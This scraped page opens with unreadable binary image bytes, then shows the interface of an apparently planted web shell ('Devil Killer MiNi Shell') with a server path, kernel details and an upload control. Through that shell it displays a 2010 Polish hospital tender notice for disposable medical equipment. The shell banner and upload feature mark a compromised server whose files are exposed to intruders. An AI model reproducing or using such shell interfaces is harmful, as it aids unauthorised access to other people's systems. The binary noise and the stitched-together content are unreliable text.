JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100528/137569-N-2010.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na zakup wraz z dostawą sprzętu medycznego jednorazowego użytku dla potrzeb własnych  Szpitala Specjalistycznego Nr 2 w Bytomiu.</b><br>
<b>Numer ogłoszenia: 137569 - 2010; data zamieszczenia: 28.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup wraz z dostawą sprzętu medycznego jednorazowego użytku dla potrzeb własnych  Szpitala Specjalistycznego Nr 2 w Bytomiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w przetargu nieograniczonym jest dostawa sprzętu medycznego jednorazowego  użytku określonego  przez Zamawiającego według grup asortymentowo                - cenowych  zgrupowanych  w  Pakietach nr 1 - 32 stanowiących załącznik A                            do specyfikacji istotnych warunków zamówienia :

Pakiet Nr 	1	IGŁY  DO  PUNKCJI  MOSTKA I TALERZA  BIODROWEGO 
Pakiet Nr 	2	CEWNIKI - ZESTAWY DO WENESEKCJI
Pakiet Nr 	3	SPRZĘT DO GROMADZENIA PŁYNÓW USTROJOWYCH
Pakiet Nr 	4	PRZYRZĄDY DO ANESTEZJI I RESUSCYTACJI I
Pakiet Nr 	5	UKŁADY ODDECHOWE  
Pakiet Nr 	6	CEWNIKI  DONOSOWE
Pakiet Nr 	7	Łączniki do drenów
Pakiet Nr 	8	KANIULA DO PŁUKANIA RAN
Pakiet Nr 	9	ELEKTRODA  DO  APARATU  IFA
Pakiet Nr 	10	ZESTAWY DO TERMOABLACJI
Pakiet Nr 	11	FARTUCHY Z FOLII
Pakiet Nr 	12	CEWNIK UROLOGICZNY ZEWNĘTRZNY
Pakiet Nr 	13	KAPILARY DO GAZOMETRII SZKLANE DO APARATU COBAS 6121 OMNI
Pakiet Nr 	14	SZKIEŁKA PODSTAWOWE I NAKRYWKOWE
Pakiet Nr 	15	PŁYTKI PETRIEGO SZKLANE
Pakiet Nr 	16	KOLBY, ZLEWKI
Pakiet Nr 	17	PIPETA PASTEURA
Pakiet Nr 	18	SZCZOTKI - STATYWY
Pakiet Nr 	19	PROBÓWKI - KUWETY DO FOTOMETRU POINTE 180
Pakiet Nr 	20	ZESTAW DO UTYLIZACJI RTĘCI
Pakiet Nr 	21	PISAKI DO EEG
Pakiet Nr 	22	SPRZĘT JEDNORAZOWY DO ZABIEGÓW LARYNGOLOGICZNYCH
Pakiet Nr 	23	APARATY DO POMP INFUZYJNYCH PRZEPŁYWOWYCH TYPU AMEDA
Pakiet Nr 	24	SONDA BABCOCKA
Pakiet Nr 	25	DROBNY SPRZĘT DO STERYLIZACJI I
Pakiet Nr 	26	CZĘŚCI DO ZAMYKANIA BUTELEK Z ROZTWOREM FORMALINY DO STERYLIZATORA TYPU FORMOMAT
Pakiet Nr 	27	RURKI TRACHEOSTOMIJNE
Pakiet Nr 	28	DROBNY SPRZĘT DO STERYLIZACJI II
Pakiet Nr 	29	FILTRY DO ZESAWU LAPAROSKOPOWEGO TYP GIMMI
Pakiet Nr 	30	PRZYRZĄDY DO ANESTEZJI I RESUSCYTACJI  I 
Pakiet Nr 	31	CZAPKI DO MOCOWANIA CEWNIKÓW DONOSOWYCH
Pakiet Nr 	32	 IGŁY  DO   PODAWANIA LEKÓW DOSZPIKOWO.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium:
	w przypadku złożenia oferty na wszystkie pakiety wadium w wysokości 1 987,35 zł. (słownie: jeden tysiąc dziewięćset osiemdziesiąt siedem zł trzydzieści pięć gr. ),
	w przypadku złożenia oferty na pakiet nr 1  wadium w wysokości 48,50 zł                        ( słownie : czterdzieści osiem  zł  pięćdziesiąt gr.),
	w przypadku złożenia oferty na pakiet nr 2 wadium w wysokości 48,00 zł                            ( słownie : czterdzieści osiem  zł ).
	w przypadku złożenia oferty na pakiet nr 3 wadium w wysokości 16,00 zł                           ( słownie : szesnaście zł ),
	w przypadku złożenia oferty na pakiet nr 4 wadium w wysokości 524,00 zł                                    ( słownie : pięćset dwadzieścia cztery zł ),
	w przypadku złożenia oferty na pakiet nr 5  wadium w wysokości 60,00 zł                             ( słownie : sześćdziesiąt  zł ),
	w przypadku złożenia oferty na pakiet nr 6  wadium w wysokości 110,00 zł                           ( słownie : sto dziesięć  zł ),
	w przypadku złożenia oferty na pakiet nr 7  wadium w wysokości 5,00 zł                             ( słownie : pięć  zł),
	w przypadku złożenia oferty na pakiet nr 8  wadium w wysokości 5,00 zł                                ( słownie : pięć  zł ),
	w przypadku złożenia oferty na pakiet nr 9  wadium w wysokości 2,25 zł                           ( słownie : dwa  zł dwadzieścia pięć gr.),
	w przypadku złożenia oferty na pakiet nr 10  wadium w wysokości 60,00 zł                             ( słownie : sześćdziesiąt  zł ),
	w przypadku złożenia oferty na pakiet nr 11  wadium w wysokości 10,00 zł                          ( słownie : dziesięć zł ),
	w przypadku złożenia oferty na pakiet nr 12  wadium w wysokości 1,40 zł                             ( słownie : jeden zł czterdzieści gr.),
	w przypadku złożenia oferty na pakiet nr 13  wadium w wysokości 180,00 zł                            ( słownie : sto osiemdziesiąt zł ),
	w przypadku złożenia oferty na pakiet nr 14  wadium w wysokości 280,00 zł                              ( słownie : dwieście osiemdziesiąt  zł ),
	w przypadku złożenia oferty na pakiet nr 15  wadium w wysokości 41,00 zł                              ( słownie : czterdzieści jeden zł ),
	w przypadku złożenia oferty na pakiet nr 16  wadium w wysokości 21,00 zł                           ( słownie : dwadzieścia jeden zł ),
	w przypadku złożenia oferty na pakiet nr 17  wadium w wysokości 13,20 zł                            ( słownie : trzynaście zł dwadzieścia gr.),
	w przypadku złożenia oferty na pakiet nr 18  wadium w wysokości 12,00 zł                           ( słownie : dwanaście zł ),
	w przypadku złożenia oferty na pakiet nr 19  wadium w wysokości 1,00 zł                           ( słownie : jeden zł ),
	w przypadku złożenia oferty na pakiet nr 20  wadium w wysokości 6,00 zł                           ( słownie : sześć zł ),
	w przypadku złożenia oferty na pakiet nr 21  wadium w wysokości 12,60 zł                           ( słownie : dwanaście zł  sześćdziesiąt gr. ),
	w przypadku złożenia oferty na pakiet nr 22  wadium w wysokości 85,00 zł                           ( słownie : osiemdziesiąt pięć zł ),
	w przypadku złożenia oferty na pakiet nr 23  wadium w wysokości 132,00 zł                           ( słownie : sto trzydzieści dwa zł ),
	w przypadku złożenia oferty na pakiet nr 24  wadium w wysokości 20,40 zł                           ( słownie : dwadzieścia  zł  czterdzieści gr.) ,
	w przypadku złożenia oferty na pakiet nr 25  wadium w wysokości 8,00 zł                           ( słownie : osiem zł  ),
	w przypadku złożenia oferty na pakiet nr 26  wadium w wysokości 109,00 zł                           ( słownie : sto dziewięć  zł  ),
	w przypadku złożenia oferty na pakiet nr 27  wadium w wysokości 27,00 	w przypadku złożenia oferty na pakiet nr 28  wadium w wysokości 10,00 zł                           ( słownie : dziesięć zł),
	w przypadku złożenia oferty na pakiet nr 29  wadium w wysokości 18,00 zł                           ( słownie : osiemnaście zł ),
	w przypadku złożenia oferty na pakiet nr 30  wadium w wysokości 14,00 zł                           ( słownie : czternaście zł ),
	w przypadku złożenia oferty na pakiet nr 31  wadium w wysokości 48,00 zł                           ( słownie : czterdzieści osiem zł ),
	w przypadku złożenia oferty na pakiet nr 32  wadium w wysokości 59,00 zł                           ( słownie : pięćdziesiąt dziewięć zł ),</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust 1 pkt 1 pzp ), tj.: są uprawnieni do występowania w obrocie prawnym i prowadzą działalność w zakresie objętym niniejszym zamówieniem, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wiedzę i doświadczenie (art. 22 ust 1 pkt 2 pzp).tj.: zrealizowali min. 2 dostawy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia. Za jedną dostawę spełniającą powyższe wymogi ( odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia ) Zamawiający uzna dostawę wyrobów medycznych, na kwotę nie mniejszą niż wartość brutto złożonej oferty każda, zapewni termin dostawy przedmiotu zamówienia nie dłuższy niż 5 dni roboczych  po dokonaniu zamówienia przez upoważnionego pracownika Zamawiającego  - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia(art. 22 ust 1 pkt 3 pzp) tj. wykonawca musi zapewnić specjalistyczny transport Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie podlegają wykluczeniu na podstawie art. 24  pzp - Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	znajdują się w sytuacji ekonomicznej i finansowej (art. 22 ust 1 pkt 4 pzp), - posiadają dostęp do wolnych środków finansowych lub zdolność kredytową w wysokości co najmniej takiej, jak wartość złożonej oferty, zapewnią stałość cen w okresie trwania umowy, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 3  SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający wymaga :
a)Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg wzoru stanowiącego załącznik nr 5 do SIWZ ( Doświadczenie zawodowe )
b)Dokumenty (np. referencje lub protokoły ) poprzednich zamawiających potwierdzające,                      że dostawy  te zostały wykonane należycie 
c)Oświadczenie dotyczące terminu dostawy  wg wzoru stanowiącego załącznik nr 6 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym   w Specyfikacji Istotnych Warunków Zamówienia Zamawiający wymaga :
a)Wypełnionych i podpisanych formularzy asortymentowo - cenowych stanowiących  załącznik A do SIWZ ( dla każdego oferowanego pakietu).
b)Dla produktów kwalifikowanych jako wyrób medyczny dokumentów potwierdzających oznaczenie wyrobu znakiem CE, o którym mowa w ustawie o wyrobach medycznych     ( Dz .U. 93-04 poz. 896 ) - aktualnych na dzień składania oferty
c)	Oświadczenie o dostarczeniu próbek oferowanego sprzętu na żądanie Zamawiającego - Załącznik nr 8 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalspec2.bytom.ids.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu , ul.St.Batorego 15, 41-902 Bytom ( pokój nr 18, I piętro - Zamówienia publiczne, Budynek.Dyrekcji )lub bezpłatnie ze strony interneowej Szpitala.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2010 godzina 09:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu , ul.St.Batorego 15, 41-902 Bytom ( pokój nr 2, parter - Kancelaria Główna, Budynek.Dyrekcji ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 	1	IGŁY  DO  PUNKCJI  MOSTKA I TALERZA  BIODROWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Igła do punkcji  - nakłuć punkcji mostka jednorazowego użytku                                              - rozmiar 16 G x 10/75 i 16 G x 10/80			20	szt.
2.	Igła półautomatyczna do punkcji typu  TruCat- do nakłuć tkanek miękkich z możliwością ustawienia dwóch długości, dwukrotnego pobrania bioptatu, w komplecie z prowadnicą umożliwiającą wykonanie repozycji bez powtórnego wkłuwania się - rozmiar 14G/100 mm			5	szt.
3.	Igła półautomatyczna do punkcji  typu TruCat do nakłuć tkanek miękkich z możliwością ustawienia dwóch długości, dwukrotnego pobrania bioptatu, w komplecie z prowadnicą umożliwiającą wykonanie repozycji bez powtórnego wkłuwania się - rozmiar 16G/100 mm			4	szt.
4.	Igła do punkcji mostka, jednorazowego użytku, sterylna, rozm. 15 G x 30 z dodatkowym zdejmowalnym uchwytem 			40	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 	2	CEWNIKI - ZESTAWY DO WENESEKCJI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cewnik epidularny do wenesekcji w rozmiarze od Ch16 do Ch 20 (przeznaczone dla chorych u których wystąpił całkowity brak mozliwości wkłucia żylnego oraz przy reanimacji )			30	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 	3	SPRZĘT DO GROMADZENIA PŁYNÓW USTROJOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wkład workowy do ssaka próżniowego 1800 - 2000 ml z pokrywką 			80	szt.
2.	Pojemnik na wkład workowy do ssaka próźniowego 1800 - 2000 ml  kompatybilne z oferowanymi wkładami workowymi 			10	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 	4	PRZYRZĄDY DO ANESTEZJI I RESUSCYTACJI I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rurka intubacyjna ustno - nosowa bez mankietu sterylna , silikonowana lub wysokiej jakości PVC                     (pakowana indywidualnie) od rozmiaru 2,0   do rozmiaru 6,5			800	szt.
2.	Rurka intubacyjna ustno - nosowa z mankietem sterylna , silikonowana lub wysokiej jakości PVC   ( pakowana indywidualnie) od rozmiaru 3,5  do rozmiaru 9,0			6 000	szt.
3	Rurka ustno - gardłowa typu Guedel sterylna (pakowana indywidualnie )  Nr 00, 0 , silikonowana , kolorowe oznakowanie wielkości zgodne z ISO, długość od 3,0 do 6,0 cm.			150	szt.
4	Rurka ustno - gardłowa typu Guedel sterylna (pakowana indywidualnie ) Nr 1 i Nr 2 silikonowana , kolorowe oznakowanie wielkości zgodne z ISO, długość od 7,0 do 9,0 cm.			4 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
